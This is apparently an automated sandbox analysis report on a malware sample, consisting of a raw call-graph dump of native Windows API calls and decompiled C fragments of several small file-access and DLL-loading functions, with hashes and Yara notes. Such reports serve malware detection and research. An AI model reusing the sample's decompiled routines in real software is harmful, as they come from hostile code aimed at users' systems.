418cd3 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31140->31241 31142 419330 31141->31142 31143 419348 31141->31143 31186 418d73 31142->31186 31143->31132 31198 418a93 31143->31198 31148 419321 31148->31097 31149 41933e 31149->31097 31151 4193dd 31246 41e5d3 31151->31246 31152 419360 31152->31097 31154 4193e9 31154->31097 31157 41f2ce 31155->31157 31156 41f2e0 31156->31100 31157->31156 31268 41ffa3 31157->31268 31159 41f300 31271 4186f3 31159->31271 31161 41f323 31161->31156 31162 4186f3 3 API calls 31161->31162 31164 41f345 31162->31164 31164->31156 31296 419a53 31164->31296 31165 41f3cd 31166 41f3dd 31165->31166 31391 41f073 LdrLoadDll 31165->31391 31307 41eee3 31166->31307 31169 41f40b 31386 41e003 31169->31386 31171 41f435 31171->31100 31173 41f0f3 LdrLoadDll 31172->31173 31174 41e05f 31173->31174 31418 a6967a 31174->31418 31175 41e07a 31175->31102 31421 41e7b3 31177->31421 31179 41f51f 31179->31067 31181 4191ec 31180->31181 31182 41f0f3 LdrLoadDll 31180->31182 31181->31121 31181->31122 31181->31125 31182->31181 31184 41e4bf NtCreateFile 31183->31184 31185 41f0f3 LdrLoadDll 31183->31185 31184->31126 31185->31184 31187 418d8f 31186->31187 31188 41e423 LdrLoadDll 31187->31188 31189 418db0 31188->31189 31190 418db7 31189->31190 31191 418dcb 31189->31191 31192 41e5d3 2 API calls 31190->31192 31193 41e5d3 2 API calls 31191->31193 31194 418dc0 31192->31194 31195 418dd4 31193->31195 31194->31149 31250 420143 LdrLoadDll RtlAllocateHeap 31195->31250 31197 418ddf 31197->31149 31199 418b11 31198->31199 31200 418ade 31198->31200 31201 418c5c 31199->31201 31205 418b2d 31199->31205 31202 41e423 LdrLoadDll 31200->31202 31203 41e423 LdrLoadDll 31201->31203 31204 418af9 31202->31204 31209 418c77 31203->31209 31206 41e5d3 2 API calls 31204->31206 31207 41e423 LdrLoadDll 31205->31207 31208 418b02 31206->31208 31210 418b48 31207->31210 31208->31152 31264 41e463 LdrLoadDll 31209->31264 31212 418b64 31210->31212 31213 418b4f 31210->31213 31214 418b69 31212->31214 31215 418b7f 31212->31215 31217 41e5d3 2 API calls 31213->31217 31219 41e5d3 2 API calls 31214->31219 31226 418b84 31215->31226 31251 420103 31215->31251 31216 418cb1 31220 41e5d3 2 API calls 31216->31220 31218 418b58 31217->31218 31218->31152 31222 418b72 31219->31222 31221 418cbc 31220->31221 31221->31152 31222->31152 31225 418bea 31227 418c01 31225->31227 31263 41e3e3 LdrLoadDll 31225->31263 31233 418b96 31226->31233 31254 41e553 31226->31254 31229 418c08 31227->31229 31230 418c1d 31227->31230 31231 41e5d3 2 API calls 31229->31231 31232 41e5d3 2 API calls 31230->31232 31231->31233 31234 418c26 31232->31234 31233->31152 31235 418c52 31234->31235 31258 41fe23 31234->31258 31235->31152 31237 418c3d 31238 420023 2 API calls 31237->31238 31239 418c46 31238->31239 31239->31152 31240->31125 31241->31148 31243 4193c5 31242->31243 31244 41f0f3 LdrLoadDll 31242->31244 31245 41e463 LdrLoadDll 31243->31245 31244->31243 31245->31151 31247 41e5ef NtClose 31246->31247 31248 41f0f3 LdrLoadDll 31246->31248 31247->31154 31248->31247 31249->31134 31250->31197 31253 42011b 31251->31253 31265 41e773 31251->31265 31253->31226 31255 41e559 31254->31255 31256 41f0f3 LdrLoadDll 31255->31256 31257 41e56f NtReadFile 31256->31257 31257->31225 31259 41fe47 31258->31259 31260 41fe30 31258->31260 31259->31237 31260->31259 31261 420103 2 API calls 31260->31261 31262 41fe5e 31261->31262 31262->31237 31263->31227 31264->31216 31266 41f0f3 LdrLoadDll 31265->31266 31267 41e78f RtlAllocateHeap 31266->31267 31267->31253 31392 41e683 31268->31392 31270 41ffd0 31270->31159 31272 418704 31271->31272 31273 41870c 31271->31273 31272->31161 31295 4189df 31273->31295 31395 421193 31273->31395 31275 418760 31276 421193 2 API calls 31275->31276 31279 41876b 31276->31279 31277 4187b9 31280 421193 2 API calls 31277->31280 31279->31277 31400 421233 31279->31400 31281 4187cd 31280->31281 31282 421193 2 API calls 31281->31282 31283 418840 31282->31283 31284 421193 2 API calls 31283->31284 31291 418888 31284->31291 31286 4189b7 31407 4211f3 LdrLoadDll RtlFreeHeap 31286->31407 31288 4189c1 31408 4211f3 LdrLoadDll RtlFreeHeap 31288->31408 31290 4189cb 31409 4211f3 LdrLoadDll RtlFreeHeap 31290->31409 31406 4211f3 LdrLoadDll RtlFreeHeap 31291->31406 31293 4189d5 31410 4211f3 LdrLoadDll RtlFreeHeap 31293->31410 31295->31161 31297 419a64 31296->31297 31298 4190f3 8 API calls 31297->31298 31299 419a7a 31298->31299 31300 419a83 31299->31300 31301 419aba 31299->31301 31304 419b06 31299->31304 31300->31165 31302 420023 2 API calls 31301->31302 31303 419acb 31302->31303 31303->31165 31305 420023 2 API calls 31304->31305 31306 419b0b 31305->31306 31306->31165 31411 41ed73 31307->31411 31309 41eef7 31310 41ed73 LdrLoadDll 31309->31310 31311 41ef00 31310->31311 31312 41ed73 LdrLoadDll 31311->31312 31313 41ef09 31312->31313 31314 41ed73 LdrLoadDll 31313->31314 31315 41ef12 31314->31315 31316 41ed73 LdrLoadDll 31315->31316 31317 41ef1b 31316->31317 31318 41ed73 LdrLoadDll 31317->31318 31319 41ef24 31318->31319 31320 41ed73 LdrLoadDll 31319->31320 31321 41ef30 31320->31321 31322 41ed73 LdrLoadDll 31321->31322 31323 41ef39 31322->31323 31324 41ed73 LdrLoadDll 31323->31324 31325 41ef42 31324->31325 31326 41ed73 LdrLoadDll 31325->31326 31327 41ef4b 31326->31327 31328 41ed73 LdrLoadDll 31327->31328 31329 41ef54 31328->31329 31330 41ed73 LdrLoadDll 31329->31330 31331 41ef5d 31330->31331 31332 41ed73 LdrLoadDll 31331->31332 31333 41ef69 31332->31333 31334 41ed73 LdrLoadDll 31333->31334 31335 41ef72 31334->31335 31336 41ed73 LdrLoadDll 31335->31336 31337 41ef7b 31336->31337 31338 41ed73 LdrLoadDll 31337->31338 31339 41ef84 31338->31339 31340 41ed73 LdrLoadDll 31339->31340 31341 41ef8d 31340->31341 31342 41ed73 LdrLoadDll 31341->31342 31343 41ef96 31342->31343 31344 41ed73 LdrLoadDll 31343->31344 31345 41efa2 31344->31345 31346 41ed73 LdrLoadDll 31345->31346 31347 41efab 31346->31347 31348 41ed73 LdrLoadDll 31347->31348 31349 41efb4 31348->31349 31350 41ed73 LdrLoadDll 31349->31350 31351 41efbd 31350->31351 31352 41ed73 LdrLoadDll 31351->31352 31353 41efc6 31352->31353 31354 41ed73 LdrLoadDll 31353->31354 31355 41efcf 31354->31355 31356 41ed73 LdrLoadDll 31355->31356 31357 41efdb 31356->31357 31358 41ed73 LdrLoadDll 31357->31358 31359 41efe4 31358->31359 31360 41ed73 LdrLoadDll 31359->31360 31361 41efed 31360->31361 31362 41ed73 LdrLoadDll 31361->31362 31363 41eff6 31362->31363 31364 41ed73 LdrLoadDll 31363->31364 31365 41efff 31364->31365 31366 41ed73 LdrLoadDll 31365->31366 31367 41f008 31366->31367 31368 41ed73 LdrLoadDll 31367->31368 31369 41f014 31368->31369 31370 41ed73 LdrLoadDll 31369->31370 31371 41f01d 31370->31371 31372 41ed73 LdrLoadDll 31371->31372 31373 41f026 31372->31373 31374 41ed73 LdrLoadDll 31373->31374 31375 41f02f 31374->31375 31376 41ed73 LdrLoadDll 31375->31376 31377 41f038 31376->31377 31378 41ed73 LdrLoadDll 31377->31378 31379 41f041 31378->31379 31380 41ed73 LdrLoadDll 31379->31380 31381 41f04d 31380->31381 31382 41ed73 LdrLoadDll 31381->31382 31383 41f056 31382->31383 31384 41ed73 LdrLoadDll 31383->31384 31385 41f05f 31384->31385 31385->31169 31387 41f0f3 LdrLoadDll 31386->31387 31388 41e01f 31387->31388 31417 a69860 LdrInitializeThunk 31388->31417 31389 41e036 31389->31171 31391->31166 31393 41e69f NtAllocateVirtualMemory 31392->31393 31394 41f0f3 LdrLoadDll 31392->31394 31393->31270 31394->31393 31396 4211a3 31395->31396 31397 4211a9 31395->31397 31396->31275 31398 420103 2 API calls 31397->31398 31399 4211cf 31398->31399 31399->31275 31401 421258 31400->31401 31404 421290 31400->31404 31402 420103 2 API calls 31401->31402 31403 42126d 31402->31403 31405 420023 2 API calls 31403->31405 31404->31279 31405->31404 31406->31286 31407->31288 31408->31290 31409->31293 31410->31295 31412 41ed8e 31411->31412 31413 419503 LdrLoadDll 31412->31413 31414 41edae 31413->31414 31415 419503 LdrLoadDll 31414->31415 31416 41ee62 31414->31416 31415->31416 31416->31309 31416->31416 31417->31389 31419 a69681 31418->31419 31420 a6968f LdrInitializeThunk 31418->31420 31419->31175 31420->31175 31422 41f0f3 LdrLoadDll 31421->31422 31423 41e7cf RtlFreeHeap 31422->31423 31423->31179 31425 4093f4 31424->31425 31426 4093fe 31425->31426 31427 41ffa3 2 API calls 31425->31427 31426->31108 31430 409428 31427->31430 31428 40948b 31428->31108 31429 41e003 2 API calls 31429->31430 31430->31428 31430->31429 31431 409491 31430->31431 31435 41ffa3 2 API calls 31430->31435 31440 41e703 31430->31440 31433 4094b7 31431->31433 31434 41e703 2 API calls 31431->31434 31433->31108 31436 4094a8 31434->31436 31435->31430 31436->31108 31438 41e703 2 API calls 31437->31438 31439 4096d1 31438->31439 31439->31069 31441 41e71f 31440->31441 31442 41f0f3 LdrLoadDll 31440->31442 31445 a696e0 LdrInitializeThunk 31441->31445 31442->31441 31443 41e736 31443->31430 31445->31443 31447 41f786 31446->31447 31450 40cec3 31447->31450 31451 40cee7 31450->31451 31452 40cf23 LdrLoadDll 31451->31452 31453 40bd74 31451->31453 31452->31453 31453->31077 31455 40d236 31454->31455 31457 40d2b3 31455->31457 31469 41ddd3 LdrLoadDll 31455->31469 31457->31082 31459 41f0f3 LdrLoadDll 31458->31459 31460 40fe0e 31459->31460 31460->31085 31461 41e913 31460->31461 31462 41e932 LookupPrivilegeValueW 31461->31462 31463 41f0f3 LdrLoadDll 31461->31463 31462->31087 31463->31462 31465 41e3bf 31464->31465 31466 41f0f3 LdrLoadDll 31464->31466 31470 a69910 LdrInitializeThunk 31465->31470 31466->31465 31467 41e3de 31467->31088 31469->31457 31470->31467 31472 40d3ba 31471->31472 31473 40d213 LdrLoadDll 31472->31473 31474 40d41d 31473->31474 31474->31039 31476 40fefd 31475->31476 31484 40ffb3 31475->31484 31477 40d213 LdrLoadDll 31476->31477 31478 40ff1f 31477->31478 31485 41e083 31478->31485 31480 40ff61 31488 41e0c3 31480->31488 31483 41e5d3 2 API calls 31483->31484 31484->31042 31484->31043 31486 41f0f3 LdrLoadDll 31485->31486 31487 41e09f 31486->31487 31487->31480 31489 41f0f3 LdrLoadDll 31488->31489 31490 41e0df 31489->31490 31493 a69fe0 LdrInitializeThunk 31490->31493 31491 40ffa7 31491->31483 31493->31491 31495 40dd4e 31494->31495 31496 40d393 LdrLoadDll 31495->31496 31497 40dda5 31496->31497 31530 40d013 31497->31530 31499 40ddcb 31529 40e01c 31499->31529 31539 418a23 31499->31539 31501 40de10 31501->31529 31542 40a023 31501->31542 31503 40de54 31503->31529 31564 41e643 31503->31564 31507 40deaa 31508 40deb1 31507->31508 31576 41e153 31507->31576 31510 420023 2 API calls 31508->31510 31512 40debe 31510->31512 31512->31056 31513 40defb 31514 420023 2 API calls 31513->31514 31515 40df02 31514->31515 31515->31056 31516 40df0b 31517 4100a3 3 API calls 31516->31517 31518 40df7f 31517->31518 31518->31508 31519 40df8a 31518->31519 31520 420023 2 API calls 31519->31520 31521 40dfae 31520->31521 31581 41e1a3 31521->31581 31524 41e153 2 API calls 31525 40dfe9 31524->31525 31525->31529 31586 41df63 31525->31586 31528 41e7f3 2 API calls 31528->31529 31529->31056 31531 40d020 31530->31531 31532 40d024 31530->31532 31531->31499 31533 40d03d 31532->31533 31534 40d06f 31532->31534 31591 41de13 LdrLoadDll 31533->31591 31592 41de13 LdrLoadDll 31534->31592 31536 40d080 31536->31499 31538 40d05f 31538->31499 31540 4100a3 3 API calls 31539->31540 31541 418a49 31539->31541 31540->31541 31541->31501 31593 40a253 31542->31593 31544 40a249 31544->31503 31545 40a041 31545->31544 31546 4093f3 4 API calls 31545->31546 31547 40a11f 31545->31547 31557 40a07f 31546->31557 31547->31544 31549 4093f3 4 API calls 31547->31549 31563 40a1ff 31547->31563 31553 40a15c 31549->31553 31550 40a213 31550->31544 31641 410313 10 API calls 31550->31641 31552 40a229 31552->31544 31642 410313 10 API calls 31552->31642 31560 409d03 14 API calls 31553->31560 31561 40a1f5 31553->31561 31553->31563 31555 40a23f 31555->31503 31557->31547 31558 40a115 31557->31558 31607 409d03 31557->31607 31559 4096b3 2 API calls 31558->31559 31559->31547 31560->31553 31562 4096b3 2 API calls 31561->31562 31562->31563 31563->31544 31640 410313 10 API calls 31563->31640 31565 41f0f3 LdrLoadDll 31564->31565 31566 41e65f 31565->31566 31726 a698f0 LdrInitializeThunk 31566->31726 31567 40de8b 31569 4100a3 31567->31569 31570 4100c0 31569->31570 31727 41e103 31570->31727 31573 410108 31573->31507 31574 41e153 2 API calls 31575 410131 31574->31575 31575->31507 31577 41e16f 31576->31577 31578 41f0f3 LdrLoadDll 31576->31578 31733 a69780 LdrInitializeThunk 31577->31733 31578->31577 31579 40deee 31579->31513 31579->31516 31582 41f0f3 LdrLoadDll 31581->31582 31583 41e1bf 31582->31583 31734 a697a0 LdrInitializeThunk 31583->31734 31584 40dfc2 31584->31524 31587 41f0f3 LdrLoadDll 31586->31587 31588 41df7f 31587->31588 31735 a69a20 LdrInitializeThunk 31588->31735 31589 40e015 31589->31528 31591->31538 31592->31536 31594 40a27a 31593->31594 31595 40a4d2 31594->31595 31596 4093f3 4 API calls 31594->31596 31595->31545 31597 40a2cd 31596->31597 31597->31595 31598 4096b3 2 API calls 31597->31598 31599 40a35c 31598->31599 31599->31595 31600 4093f3 4 API calls 31599->31600 31601 40a371 31600->31601 31601->31595 31602 4096b3 2 API calls 31601->31602 31605 40a3d1 31602->31605 31603 4093f3 4 API calls 31603->31605 31604 409d03 14 API calls 31604->31605 31605->31595 31605->31603 31605->31604 31606 4096b3 2 API calls 31605->31606 31606->31605 31608 409d28 31607->31608 31643 41de53 31608->31643 31611 409d7c 31611->31557 31612 41e043 2 API calls 31614 409da0 31612->31614 31613 409dfd 31676 4101f3 LdrLoadDll NtClose 31613->31676 31614->31613 31616 409dab 31614->31616 31618 409e29 31616->31618 31646 40e033 31616->31646 31617 409e18 31619 409e35 31617->31619 31620 409e1f 31617->31620 31618->31557 31677 41ded3 LdrLoadDll 31619->31677 31622 41e5d3 2 API calls 31620->31622 31622->31618 31623 409dc5 31623->31618 31666 409b33 31623->31666 31625 409e60 31627 40e033 5 API calls 31625->31627 31629 409e80 31627->31629 31629->31618 31678 41df03 LdrLoadDll 31629->31678 31631 409ea5 31679 41df93 LdrLoadDll 31631->31679 31633 409ebf 31634 41df63 2 API calls 31633->31634 31635 409ece 31634->31635 31636 41e5d3 2 API calls 31635->31636 31637 409ed8 31636->31637 31680 409903 31637->31680 31639 409eec 31639->31557 31640->31550 31641->31552 31642->31555 31644 41f0f3 LdrLoadDll 31643->31644 31645 409d72 31644->31645 31645->31611 31645->31612 31645->31613 31647 40e061 31646->31647 31648 4100a3 3 API calls 31647->31648 31649 40e0c0 31648->31649 31650 40e109 31649->31650 31651 41e153 2 API calls 31649->31651 31650->31623 31652 40e0eb 31651->31652 31653 40e0f5 31652->31653 31656 40e115 31652->31656 31654 41e1a3 2 API calls 31653->31654 31655 40e0ff 31654->31655 31657 41e5d3 2 API calls 31655->31657 31658 40e182 31656->31658 31659 40e19f 31656->31659 31657->31650 31660 41e5d3 2 API calls 31658->31660 31661 41e1a3 2 API calls 31659->31661 31663 40e18c 31660->31663 31662 40e1ae 31661->31662 31664 41e5d3 2 API calls 31662->31664 31663->31623 31665 40e1b8 31664->31665 31665->31623 31667 409b49 31666->31667 31672 409cd4 31667->31672 31696 4096f3 31667->31696 31669 409c48 31670 409903 11 API calls 31669->31670 31669->31672 31671 409c76 31670->31671 31671->31672 31673 41e043 2 API calls 31671->31673 31672->31557 31674 409cab 31673->31674 31674->31672 31675 41e643 2 API calls 31674->31675 31675->31672 31676->31617 31677->31625 31678->31631 31679->31633 31681 40992c 31680->31681 31703 409863 31681->31703 31684 41e643 2 API calls 31685 40993f 31684->31685 31685->31684 31686 4099ca 31685->31686 31689 4099c5 31685->31689 31711 410273 31685->31711 31686->31639 31687 41e5d3 2 API calls 31688 4099fd 31687->31688 31688->31686 31690 41de53 LdrLoadDll 31688->31690 31689->31687 31691 409a62 31690->31691 31691->31686 31715 41de93 31691->31715 31693 409ac6 31693->31686 31694 4190f3 8 API calls 31693->31694 31695 409b1b 31694->31695 31695->31639 31697 4097f2 31696->31697 31698 409708 31696->31698 31697->31669 31698->31697 31699 4190f3 8 API calls 31698->31699 31700 409775 31699->31700 31701 420023 2 API calls 31700->31701 31702 40979c 31700->31702 31701->31702 31702->31669 31704 40987d 31703->31704 31705 40cec3 LdrLoadDll 31704->31705 31706 409898 31705->31706 31707 419503 LdrLoadDll 31706->31707 31708 4098b0 31707->31708 31709 4098b9 PostThreadMessageW 31708->31709 31710 4098cc 31708->31710 31709->31710 31710->31685 31712 410286 31711->31712 31720 41dfd3 31712->31720 31716 41f0f3 LdrLoadDll 31715->31716 31717 41deaf 31715->31717 31716->31717 31717->31693 31718 41f0f3 LdrLoadDll 31717->31718 31719 41deef 31718->31719 31719->31693 31721 41dfef 31720->31721 31722 41f0f3 LdrLoadDll 31720->31722 31725 a69840 LdrInitializeThunk 31721->31725 31722->31721 31723 4102b1 31723->31685 31725->31723 31726->31567 31728 41e11f 31727->31728 31729 41f0f3 LdrLoadDll 31727->31729 31732 a699a0 LdrInitializeThunk 31728->31732 31729->31728 31730 410101 31730->31573 31730->31574 31732->31730 31733->31579 31734->31584 31735->31589 31736 40b483 31737 40b4a8 31736->31737 31738 40cec3 LdrLoadDll 31737->31738 31739 40b4db 31738->31739 31741 40b500 31739->31741 31742 40ea73 31739->31742 31743 40ea9f 31742->31743 31744 41e323 LdrLoadDll 31743->31744 31745 40eab8 31744->31745 31746 40eabf 31745->31746 31753 41e363 31745->31753 31746->31741 31750 40eafa 31751 41e5d3 2 API calls 31750->31751 31752 40eb1d 31751->31752 31752->31741 31754 41f0f3 LdrLoadDll 31753->31754 31755 41e37f 31754->31755 31759 a69710 LdrInitializeThunk 31755->31759 31756 40eae2 31756->31746 31758 41e953 LdrLoadDll 31756->31758 31758->31750 31759->31756 31762 a69540 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 0041E4F5 Relevance: 1.6, APIs: 1, Instructions: 72filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 287 41e4f5-41e502 288 41e504-41e54c call 41f0f3 287->288 289 41e559-41e59c call 41f0f3 NtReadFile 287->289
                                                              C-Code - Quality: 100%
                                                              			E0041E4F5(signed int __eax, void* __ebx, signed int __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
				signed int _t31;

				_t31 = __eax / __eax;
				_t5 = __ebx + 0x2e4b0afb;
				 *_t5 =  *(__ebx + 0x2e4b0afb) << __ecx;
				if ( *_t5 != 0) goto L3;
			}




                                                              0x0041e4f5
                                                              0x0041e4f7
                                                              0x0041e4f7
                                                              0x0041e502

                                                              APIs
                                                              • NtReadFile.NTDLL(00419423,004148FB,FFFFFFFF,00418F0D,00000002,?,00419423,00000002,00418F0D,FFFFFFFF,004148FB,00419423,00000002,00000000), ref: 0041E598
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 195050e28d23fe9314e9b3cc641e46f880cc347a8188923005f724bd71e65b30
                                                              • Instruction ID: b4f907958c946901df5c523c9373257d37c1c82cb2dc8fb410541eafeae79dcc
                                                              • Opcode Fuzzy Hash: 195050e28d23fe9314e9b3cc641e46f880cc347a8188923005f724bd71e65b30
                                                              • Instruction Fuzzy Hash: E12106B2204108AFCB04DF99DC84EEB37A9EF8C314F158649BA1DA7251C634E812CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040CEC3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 327 40cec3-40ceec call 420db3 330 40cef2-40cf00 call 4212d3 327->330 331 40ceee-40cef1 327->331 334 40cf10-40cf21 call 41f663 330->334 335 40cf02-40cf0d call 421553 330->335 340 40cf23-40cf37 LdrLoadDll 334->340 341 40cf3a-40cf3d 334->341 335->334 340->341
                                                              C-Code - Quality: 100%
                                                              			E0040CEC3(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E00420DB3( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E004212D3(__ebx, __edi, __eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421553( &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E0041F663(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                              0x0040cedf
                                                              0x0040cee2
                                                              0x0040cee7
                                                              0x0040ceec
                                                              0x0040cef6
                                                              0x0040cefb
                                                              0x0040cefe
                                                              0x0040cf00
                                                              0x0040cf08
                                                              0x0040cf0d
                                                              0x0040cf0d
                                                              0x0040cf14
                                                              0x0040cf1c
                                                              0x0040cf1f
                                                              0x0040cf21
                                                              0x0040cf35
                                                              0x00000000
                                                              0x0040cf37
                                                              0x0040cf3d
                                                              0x0040cef1
                                                              0x0040cef1
                                                              0x0040cef1

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF35
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: d373418fb1c166856ac7728ca66b4556e53d67b9849615d757f77e043b8da0c9
                                                              • Instruction ID: 793413ec26a04db9af96aa33daec49e89e857d7609166dde623cdd919efbe171
                                                              • Opcode Fuzzy Hash: d373418fb1c166856ac7728ca66b4556e53d67b9849615d757f77e043b8da0c9
                                                              • Instruction Fuzzy Hash: DC0112B5E0020DB7DF10DBE5DD82FDEB3B89B54308F0041A6E909A7281F635EB558795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E5FF Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 342 41e5ff-41e601 343 41e603-41e640 call 41f0f3 342->343 344 41e5e5-41e5e7 342->344 346 41e5ef-41e5fc NtClose 344->346 347 41e5ea call 41f0f3 344->347 347->346
                                                              APIs
                                                              • NtClose.NTDLL(00410258,00000000,?,00410258,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E5F8
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 964d2c34ce4d65e69d467085f63a0ee9546543fd9c48347c9a5f10d6631a49b5
                                                              • Instruction ID: 06ecf44fa9145c1ec2df0aaec82395b58b0bdeef8ea3e4e0781b88fbbc2217c2
                                                              • Opcode Fuzzy Hash: 964d2c34ce4d65e69d467085f63a0ee9546543fd9c48347c9a5f10d6631a49b5
                                                              • Instruction Fuzzy Hash: 05F08C75204248AFCB00DF99DC84EDB7BA9EF8D318F108159FD4897202D634F9118BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E49E Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 350 41e49e-41e4f4 call 41f0f3 NtCreateFile
                                                              C-Code - Quality: 79%
                                                              			E0041E49E(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;

				asm("arpl [eax-0x74aa5d33], bx");
				_t18 = _a4;
				_t4 = _t18 + 0xa6c; // 0xa6c
				E0041F0F3( *((intOrPtr*)(_a4 + 0x14)), _t18, _t4,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}




                                                              0x0041e49f
                                                              0x0041e4a6
                                                              0x0041e4b2
                                                              0x0041e4ba
                                                              0x0041e4f0
                                                              0x0041e4f4

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,?,0041925F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041925F,?,00000000,00000060,00000000,00000000), ref: 0041E4F0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 62396fe2fa38cc8bb8f1e486579f8c955fcac9a4fecde8212f0c86e78c2d327a
                                                              • Instruction ID: bb6fdff33ae2873097fe25d679d40c92d895a9b49d645e80b9fb28e566df7c08
                                                              • Opcode Fuzzy Hash: 62396fe2fa38cc8bb8f1e486579f8c955fcac9a4fecde8212f0c86e78c2d327a
                                                              • Instruction Fuzzy Hash: EF01B2B2205108AFCB48DF98DC84EEB37A9EF8C354F158258BA0DD7241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E4A3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 353 41e4a3-41e4b9 354 41e4bf-41e4f4 NtCreateFile 353->354 355 41e4ba call 41f0f3 353->355 355->354
                                                              C-Code - Quality: 100%
                                                              			E0041E4A3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F0F3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                              0x0041e4b2
                                                              0x0041e4ba
                                                              0x0041e4f0
                                                              0x0041e4f4

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,?,0041925F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041925F,?,00000000,00000060,00000000,00000000), ref: 0041E4F0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                              • Instruction ID: 35c4fe2ffe3c6b52965f7c3831f052ca21d80fb83ac25b5efaf14bf95c37be99
                                                              • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                              • Instruction Fuzzy Hash: 33F07FB2215208AFCB48DF89DC85EEB77EDAF8C754F158258BA0D97241D630F851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E553 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
